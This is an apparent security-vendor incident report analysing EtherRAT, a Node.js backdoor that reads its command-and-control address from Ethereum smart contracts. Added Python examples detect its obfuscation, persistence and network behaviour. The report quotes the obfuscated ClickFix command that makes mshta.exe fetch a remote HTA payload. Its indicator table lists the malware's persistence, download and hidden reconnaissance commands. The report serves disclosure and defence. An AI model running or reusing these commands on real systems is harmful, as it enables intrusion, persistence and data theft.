During a recent incident investigation in the retail sector, a sophisticated malware strain known as EtherRAT was identified within a customer’s environment. This threat represents a growing trend in modern cyber operations, where attackers combine traditional backdoor capabilities with decentralized technologies like blockchain to improve resilience and evade detection.
EtherRAT is a Node.js-based remote access trojan (RAT) that allows adversaries to execute arbitrary commands, collect detailed system intelligence, and extract sensitive assets such as cryptocurrency wallets and cloud credentials. What makes this malware particularly notable is its use of a technique called EtherHiding, where command-and-control (C2) infrastructure is dynamically retrieved from Ethereum smart contracts. This significantly complicates takedown efforts and enables attackers to rotate infrastructure at minimal cost.
The activity also shows strong overlaps with previously documented campaigns, including similarities to the Tsundere botnet and tactics associated with North Korean APT operations.

Initial Access and Entry Techniques
In this case, the attackers gained entry through a method known as ClickFix, although other campaigns frequently rely on IT support scams delivered via Microsoft Teams and QuickAssist.
The ClickFix chain used an indirect execution method involving legitimate Windows binaries. Specifically, the attacker leveraged pcalua.exe to execute mshta.exe, which then downloaded a malicious HTA file.
Obfuscated Command Observed
"C:\Windows\system32\cmd.exe" /min /c "p^c^a^l^u^a^.^e^x^e ^-a ^m^s^h^t^a^.^e^x^e ^-c ^h^t^t^p^s^:^/^/w^w^w^-^f^l^o^w^-^s^u^b^m^i^s^s^i^o^n^-^m^a^n^a^g^e^m^e^n^t^.^s^h^e^p^h^e^r^d^s^e^s^t^a^t^e^s^.^u^k^/^s^h^e^p^.^h^t^a^"
Deobfuscated Version
"C:\Windows\system32\cmd.exe" /min /c "pcalua.exe -a mshta.exe -c hxxps://www-flow-submission-management.shepherdsestates[.]uk/shep.hta"
This approach allowed the attackers to bypass standard command-line restrictions while blending in with legitimate system activity.
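As an added example that is not part of the original write-up, the following Python snippet undoes the cmd.exe caret escaping seen above and flags the pcalua.exe-to-mshta.exe proxy-execution chain so the command can be matched by a detection rule. The sample input is the observed command line; the function names, the caret threshold and the LOLBin watchlist are my own assumptions, not something the malware or the incident team used.

```python
import re

# cmd.exe treats '^' as an escape: '^x' yields 'x' and '^^' yields a literal '^'.
# A non-overlapping left-to-right substitution reproduces exactly that behaviour.
CARET_ESCAPE = re.compile(r"\^(.)", re.DOTALL)

# Assumed watchlist of (parent, child) proxy-execution pairs, seeded with the
# pcalua.exe -> mshta.exe chain seen in this incident.
LOLBIN_CHAINS = [("pcalua.exe", "mshta.exe")]

# Assumed threshold: benign command lines rarely carry this many carets.
CARET_ALERT_THRESHOLD = 10


def decaret(cmdline: str) -> str:
    """Undo cmd.exe caret escaping so the command can be matched normally."""
    return CARET_ESCAPE.sub(lambda m: m.group(1), cmdline)


def defang(text: str) -> str:
    """Neutralise URLs before the result is pasted into a report or ticket."""
    return re.sub(r"\bhttp(s?)://", r"hxxp\1://", text)


def analyze(cmdline: str) -> dict:
    """Deobfuscate one command line and return the detection findings for it."""
    clean = decaret(cmdline)
    lowered = clean.lower()
    caret_count = cmdline.count("^")
    findings = []
    if caret_count >= CARET_ALERT_THRESHOLD:
        findings.append(f"caret obfuscation ({caret_count} carets)")
    for parent, child in LOLBIN_CHAINS:
        if parent in lowered and child in lowered:
            findings.append(f"{parent} proxying {child}")
    if re.search(r"mshta\.exe.*?https?://", lowered):
        findings.append("mshta.exe fetching a remote HTA")
    return {"deobfuscated": clean, "caret_count": caret_count, "findings": findings}


# Sample input: the obfuscated ClickFix command line observed in this incident.
OBSERVED = (
    r'"C:\Windows\system32\cmd.exe" /min /c "p^c^a^l^u^a^.^e^x^e ^-a ^m^s^h^t^a^.^e^x^e ^-c '
    r'^h^t^t^p^s^:^/^/w^w^w^-^f^l^o^w^-^s^u^b^m^i^s^s^i^o^n^-^m^a^n^a^g^e^m^e^n^t^.'
    r'^s^h^e^p^h^e^r^d^s^e^s^t^a^t^e^s^.^u^k^/^s^h^e^p^.^h^t^a^"'
)

if __name__ == "__main__":
    result = analyze(OBSERVED)
    print(defang(result["deobfuscated"]))
    for finding in result["findings"]:
        print(" -", finding)
```

The caret stripping only applies once the outer quotes of the `cmd /c "..."` argument have been removed, which is what cmd.exe itself does before re-parsing the command; run the same normalisation on process-creation telemetry before matching it against LOLBin rules, otherwise the `p^c^a^l^u^a` spelling defeats a plain string match.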
Attack Chain Breakdown
Stage 1: Loader Execution
The first stage consists of a lightweight Node.js script that decrypts a secondary payload using AES-256-CBC. The encrypted content is stored in:
aeJ8aMT9ogQtKEb.dat
The script then executes the decrypted payload directly in memory using Node.js internal compilation functions, avoiding disk-based detection.
Stage 2: Payload Deployment and Persistence
The second stage is heavily obfuscated (likely using Obfuscator.io) and performs two key actions:
- Decrypts the main EtherRAT payload
- Establishes persistence via Windows Registry
The encrypted payload is stored as: 2htgIPQLUYA3aWq.cfg
After decryption, it is written to disk as: TLHA1IlxoF.bin
Execution is performed using: child_process.spawn()
Persistence is achieved by creating a registry key under: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
The attackers cleverly use conhost.exe with a hidden Node.js process to maintain stealth.
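The Run-key persistence described above can be hunted for in exported registry data. The following Python example is added here and is not code from the write-up or the malware; it inspects HKCU Run values for the headless conhost.exe launcher, a node.exe copy under AppData, a payload argument with a non-script extension and a random hex value name. The sample entries are constructed from the reg add command in the IOC table with `<USERNAME>` as a placeholder, and the thresholds and helper names are my assumptions.

```python
import re

# A Windows command-line token is either a double-quoted run or a bare run of
# non-whitespace characters; Run values carry no cmd.exe caret escaping.
TOKEN = re.compile(r'"([^"]*)"|(\S+)')
# The observed value name was 0c939bf7ae8f: hex with no meaning. Length assumed.
RANDOM_HEX_NAME = re.compile(r"^[0-9a-f]{8,}$", re.IGNORECASE)
# Per-user writable locations; packaged software normally lives elsewhere.
USER_WRITABLE = re.compile(r"\\AppData\\(Local|Roaming)\\", re.IGNORECASE)
# Extensions the loader used for its payload files; a hosted script argument
# ending like this is not how Node.js applications are normally started.
PAYLOAD_EXTENSIONS = (".bin", ".cfg", ".dat")


def tokenize(cmd: str) -> list[str]:
    """Split a Run value into its quoted and unquoted tokens."""
    return [quoted or bare for quoted, bare in TOKEN.findall(cmd)]


def basename(path: str) -> str:
    """Last path component, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def inspect_run_value(name: str, data: str) -> list[str]:
    """Reasons a single HKCU Run value resembles the observed persistence."""
    tokens = tokenize(data)
    if not tokens:
        return []
    reasons = []
    args = [t.lower() for t in tokens[1:]]
    if basename(tokens[0]).lower() == "conhost.exe" and "--headless" in args:
        reasons.append("conhost.exe --headless used as a hidden launcher")
    hosted = [t for t in tokens[1:] if basename(t).lower() == "node.exe"]
    if hosted and USER_WRITABLE.search(hosted[0]):
        reasons.append("node.exe started from a user-writable AppData path")
    payloads = [t for t in tokens[1:] if t.lower().endswith(PAYLOAD_EXTENSIONS)]
    if payloads:
        reasons.append("script argument with payload-style extension: " + basename(payloads[0]))
    if RANDOM_HEX_NAME.match(name):
        reasons.append("value name is random-looking hex")
    return reasons


def hunt_run_keys(values: dict[str, str]) -> dict[str, list[str]]:
    """Apply the checks to every (name, data) pair exported from the Run key."""
    hits = {}
    for name, data in values.items():
        reasons = inspect_run_value(name, data)
        if reasons:
            hits[name] = reasons
    return hits


# Constructed sample: the first entry mirrors the reg add command from the IOC
# table (<USERNAME> is a placeholder); the second is an ordinary benign entry.
SAMPLE_RUN_VALUES = {
    "0c939bf7ae8f": r'conhost.exe --headless "C:\Users\<USERNAME>\AppData\Local\VZM5DH\xgYbxq\node.exe" "C:\Users\<USERNAME>\AppData\Local\VZM5DH\TlHAiIlxoF.bin"',
    "OneDrive": r'"C:\Users\<USERNAME>\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}

if __name__ == "__main__":
    for name, reasons in hunt_run_keys(SAMPLE_RUN_VALUES).items():
        print(name)
        for reason in reasons:
            print(" -", reason)
```

Any one of these reasons alone is weak (plenty of legitimate Electron-style tools ship their own node.exe under AppData), so treat the count of matching reasons as the score and page on two or more; the conhost.exe --headless launcher combined with a random hex value name is the strongest pairing in this case.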
Stage 3: EtherRAT Core Functionality
At its core, EtherRAT acts as a fully functional backdoor. It communicates with remote infrastructure, executes attacker commands, and continuously polls for instructions.
The malware is highly obfuscated and dynamically resolves its strings at runtime, making static analysis difficult.
Command-and-Control via Blockchain (EtherHiding)
One of the most advanced aspects of this malware is its use of blockchain technology.
Instead of hardcoding C2 servers, EtherRAT retrieves them from an Ethereum smart contract:
0xe26c57b7fa8de030238b0a71b3d063397ac127d3
By querying multiple public RPC providers, the malware determines the most commonly returned C2 address.
RPC Providers Used
https://eth.llamarpc.com
https://mainnet.gateway.tenderly.co
https://rpc.flashbots.net/fast
https://rpc.mevblocker.io
https://eth-mainnet.public.blastapi.io
https://ethereum-rpc.publicnode.com
https://rpc.payload.de
https://eth.drpc.org
https://eth.merkle.io
This decentralized approach ensures that even if one infrastructure node is taken down, others remain accessible.
C2 Communication Pattern
Once the C2 address is retrieved, the malware constructs requests that mimic legitimate CDN traffic.
Example URL Pattern
<C2>/api/<random_hex>/<uuid>/<random_file>.<ext>?<param>=<id>
Observed Example
hxxps://aurineuroth[.]com/api/5f459179/29e96c95-62a5-49e5-a8ba-7ebfbf560ab7/b435a6b1.ico?b=9e2f9c07-f85a-4089-8669-186f56bca7b3
This design helps the malware blend into normal web traffic, making detection significantly harder.
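To turn the two network behaviours described above, the EtherHiding lookups against public RPC providers and the CDN-like C2 URL pattern, into a hunt, the following Python example walks JSON-lines proxy records and reports the matches. It is added here and is not code from the write-up; the RPC host list, the contract address and the first sample URL come from the page, while the record format, the process allowlist and the other sample records are constructed assumptions.

```python
import json
import re
from urllib.parse import urlsplit

# Public Ethereum JSON-RPC hosts the malware rotates through (from the write-up).
RPC_HOSTS = {
    "eth.llamarpc.com", "mainnet.gateway.tenderly.co", "rpc.flashbots.net",
    "rpc.mevblocker.io", "eth-mainnet.public.blastapi.io",
    "ethereum-rpc.publicnode.com", "rpc.payload.de", "eth.drpc.org", "eth.merkle.io",
}
# Smart contract the C2 address is read from (from the write-up).
C2_CONTRACT = "0xe26c57b7fa8de030238b0a71b3d063397ac127d3"
# Assumed: processes that may legitimately reach RPC nodes in this environment.
RPC_ALLOWED_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe"}

# CDN-mimicking C2 path derived from the single observed sample:
# /api/<hex>/<uuid>/<hex>.<ext>?<param>=<uuid>
UUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
C2_PATH = re.compile(rf"^/api/[0-9a-f]+/{UUID}/[0-9a-f]+\.[a-z0-9]{{2,5}}$")
C2_QUERY = re.compile(rf"^[a-z0-9_]+={UUID}$")


def check_record(rec: dict) -> list[str]:
    """Return the reasons one proxy record matches EtherRAT network behaviour."""
    reasons = []
    parts = urlsplit(rec["url"])
    host = parts.hostname or ""
    process = rec.get("process", "").lower()
    if host in RPC_HOSTS and process not in RPC_ALLOWED_PROCESSES:
        reasons.append(f"non-browser process {process} contacting public RPC {host}")
        try:
            body = json.loads(rec.get("body") or "{}")
        except json.JSONDecodeError:
            body = {}
        if body.get("method") == "eth_call":
            params = body.get("params") or [{}]
            target = params[0].get("to", "") if isinstance(params[0], dict) else ""
            if target.lower() == C2_CONTRACT:
                reasons.append("eth_call against the known EtherHiding C2 contract")
    if C2_PATH.match(parts.path) and C2_QUERY.match(parts.query):
        reasons.append("URL matches the CDN-like C2 request pattern")
    return reasons


def hunt(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Run the checks over JSON-lines proxy records; return (url, reasons) hits."""
    hits = []
    for line in lines:
        rec = json.loads(line)
        reasons = check_record(rec)
        if reasons:
            hits.append((rec["url"], reasons))
    return hits


# Constructed sample records: the first URL is the observed one and the RPC host
# and contract are from the write-up; processes and request bodies are made up.
SAMPLE_LOG = [
    json.dumps({"process": "node.exe",
                "url": "https://aurineuroth.com/api/5f459179/29e96c95-62a5-49e5-a8ba-7ebfbf560ab7/b435a6b1.ico?b=9e2f9c07-f85a-4089-8669-186f56bca7b3"}),
    json.dumps({"process": "node.exe", "url": "https://eth.llamarpc.com/",
                "body": json.dumps({"jsonrpc": "2.0", "id": 1, "method": "eth_call",
                                    "params": [{"to": C2_CONTRACT, "data": "0x"}, "latest"]})}),
    json.dumps({"process": "chrome.exe", "url": "https://eth.llamarpc.com/",
                "body": json.dumps({"jsonrpc": "2.0", "id": 2, "method": "eth_blockNumber", "params": []})}),
    json.dumps({"process": "chrome.exe", "url": "https://cdn.example.test/api/v1/assets/logo.ico?v=3"}),
]

if __name__ == "__main__":
    for url, reasons in hunt(SAMPLE_LOG):
        print(url)
        for reason in reasons:
            print(" -", reason)
```

The URL regex is deliberately tight because it is built from one observed request; loosen it only with more samples, otherwise ordinary CDN asset URLs start to match. The RPC check is the more durable signal: a non-browser process posting `eth_call` to a public provider is rare on a corporate endpoint, and the contract address turns that into a high-confidence hit even after the C2 domains rotate.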
System Fingerprinting (SYS_INFO Module)
After establishing communication, EtherRAT deploys an additional module referred to as SYS_INFO, which performs deep system reconnaissance.
Key Data Collected
- Public IP address
- CPU and GPU details
- Username and hostname
- Operating system and architecture
- Installed antivirus solutions
- Domain membership
- RAM and uptime
- MAC address
- Machine GUID
Before collecting data, the malware checks for CIS-region languages (e.g., Russian, Kazakh). If detected, it terminates itself, likely to avoid targeting certain regions.
Self-Modification and Reobfuscation
Another advanced feature is the malware’s ability to rewrite itself.
It sends its source code to the C2 server, receives a newly obfuscated version, overwrites itself, and restarts. This makes signature-based detection extremely unreliable over time.
Incident Response Actions
The SOC team took immediate containment actions:
- Isolated the infected host
- Prevented lateral movement
- Initiated monitoring across endpoints, logs, and network telemetry
- Assisted the customer with remediation
Security Recommendations
Organizations should take the following steps to reduce risk:
- Disable mshta.exe and pcalua.exe via application control policies
- Restrict access to the Run dialog through Group Policy
- Conduct phishing and social engineering awareness training
- Block access to known crypto RPC endpoints
- Deploy EDR or MDR solutions for continuous monitoring
Indicators of Compromise (IOCs)
| Type | Value | Description |
|---|---|---|
| Command Line | C:\Windows\system32\cmd.exe /c where curl.exe 2>nul | Uses LOLBin where.exe to determine the path of curl.exe (CURL) |
| Command Line | "C:\Windows\System32\curl.exe" -s -L -o "C:\Users\<USERNAME>\AppData\Local\Temp\QE35OO5mUa.zip" "https://nodejs.org/dist/v18.17.0/node-v18.17.0-win-x64.zip" | Download node version 18.17.0 portable via CURL |
| Command Line | ta""r -xf "C:\Users\<USERNAME>\AppData\Local\Temp\QE35OO5mUa.zip" -C "C:\Users\<USERNAME>\AppData\Local\VZM5DH" | Unzip node via obfuscated 'ta""r' command |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "0c939bf7ae8f" /t REG_SZ /d "conhost.exe --headless "C:\Users\<USERNAME>\AppData\Local\VZM5DH\xgYbxq\node.exe" "C:\Users\<USERNAME>\AppData\Local\VZM5DH\TlHAiIlxoF.bin"" /f" | Persistence via LOLBin reg.exe with headless conhost for EtherRAT payload |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "[System.Globalization.CultureInfo]::InstalledUICulture.Name"" | Fingerprinting by getting the victim host's language |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_VideoController).Name -join ', '"" | Fingerprinting by getting the name of the victim machine's GPU |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "try { (Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct -EA Stop).displayName -join ', ' } catch { 'none' }"" | Get installed AntiVirus information from the victim machine |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_ComputerSystem).Domain"" | Get the Active Directory (AD) domain the victim machine is joined to |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_ComputerSystem).PartOfDomain"" | Check if the victim machine is part of an AD domain (potentially indicating it could be of high value) |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c "reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName" | Fingerprinting victim OS name |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c "net session" | Discovery command to list session information |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "Get-WmiObject Win32_LogicalDisk \| Select-Object DeviceID,VolumeName,Size,FreeSpace,DriveType \| ConvertTo-Json"" | Discovery command to list information about drives, output as JSON |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c "net use" | Discovery command used in listing network resources, e.g. shared directories |
| URL | https://nodejs.org/dist/v18.17.0/node-v18.17.0-win-x64.zip | Node.js download URL |
| Domain | jariosos.com | EtherRAT C2 |
| Domain | hayesmed.com | EtherRAT C2 |
| Domain | regancontrols.com | EtherRAT C2 |
| Domain | salinasrent.com | EtherRAT C2 |
| Domain | justtalken.com | EtherRAT C2 |
| Domain | mebeliotmasiv.com | EtherRAT C2 |
| Domain | euclidrent.com | EtherRAT C2 |
| Domain | o-parana.com | EtherRAT C2 |
| Domain | palshona.com | EtherRAT C2 |
| Domain | aurineuroth.com | EtherRAT C2 |
| IP | 185.218.19.162 | EtherRAT C2 |
| Command Line (Linux) | lspci 2>/dev/null \| grep -i vga \| cut -d: -f3 | Get GPU name on Linux |
| Command Line (Linux) | glxinfo 2>/dev/null \| grep "OpenGL renderer" \| cut -d: -f2 | Get GPU name on Linux (fallback) |
| Command Line (Linux/macOS) | ps aux 2>/dev/null | List running processes to identify installed AntiVirus |
| Command Line (Linux/macOS) | hostname -d 2>/dev/null \|\| dnsdomainname 2>/dev/null \|\| echo "local" | Get the victim domain |
| Command Line (Linux) | lsb_release -d 2>/dev/null | cut -f2 | Get victim machine OS information |
| Command Line (macOS) | sw_vers -productName && sw_vers -productVersion | Get victim machine OS information |
| File | 2edf1ab615b489e228a89c617d24f66d1e780a6d5e30f6886608dfe79325acf8 | EtherRAT HTA script “shep.hta” |
| File | 294c597c89023093e1e175949f5104f887b89cd8e1cf1d3192ee9032739f259e | EtherRAT MSI loader |
| File | 5623f4f8942872b2b7cb6d2674c126a42bdf6ed5d1f37c1afc348529e4697d73 | EtherRAT stage 1 |
| File | b1ee812e7c786c8696f913595658e57706d97a66ca7b7634f421f5c552e7002b | EtherRAT stage 2 (deobfuscated) |
| File | 47f74749cfcd55c8dacde2cc9b4c45282bec7a93ee19b7b81b452c99758d3370 | EtherRAT stage 2 (obfuscated) |
| File | 03c4e54cc775ab819752dc5d420ab2fed03bd445c3ce398d021031100b334fb4 | EtherRAT (deobfuscated) |
| File | 7dd1bf7a58774a081062f5c8f183d24f95c433805e0bf73280c0adba1c71390d | EtherRAT (obfuscated) |
| File | 83b1f11c6a0bd267e415136440559131d2d4ace9a65dc221ea3b144fe0e7199b | EtherRAT SYS_INFO module |
| Domain | www-flow-submission-management.shepherdsestates.uk | Compromised website serving HTA/MSI |
Our Analysis and Opinion
From our perspective, this case clearly shows how modern malware is evolving beyond traditional infrastructure and moving into decentralized ecosystems. The use of Ethereum smart contracts for C2 retrieval is not just a technical novelty—it represents a strategic shift. Attackers are deliberately choosing platforms that are inherently resistant to takedown, making defensive efforts more complex and resource-intensive.
What stands out most is how well EtherRAT blends multiple techniques. It combines social engineering (ClickFix and IT support scams), living-off-the-land binaries (LOLBins), strong encryption, and blockchain-based infrastructure. Individually, these techniques are not new. However, the way they are integrated into a single attack chain demonstrates a high level of operational maturity.
Another important observation is the malware’s adaptability. Features like self-reobfuscation and dynamic C2 updates mean that traditional detection methods—especially static signatures—are becoming less effective. Security teams can no longer rely only on known indicators; behavioral detection and threat hunting are now essential.
The CIS language check also suggests deliberate targeting. This is not opportunistic malware spreading randomly—it is designed to avoid specific regions, which is often seen in state-linked operations. This further supports the idea that EtherRAT is part of a broader, organized campaign rather than isolated criminal activity.
From a defensive standpoint, organizations need to rethink visibility. Encrypted traffic over TLS 1.3, CDN-like communication patterns, and blockchain-based configuration channels all reduce the effectiveness of perimeter-based controls. Detection must move closer to the endpoint, where behavior can be monitored in real time.
In conclusion, EtherRAT is a strong example of how threat actors are innovating faster than traditional defenses. It highlights the urgent need for layered security, continuous monitoring, and user awareness. Organizations that fail to adapt to these changes will find it increasingly difficult to detect and respond to such threats in time.
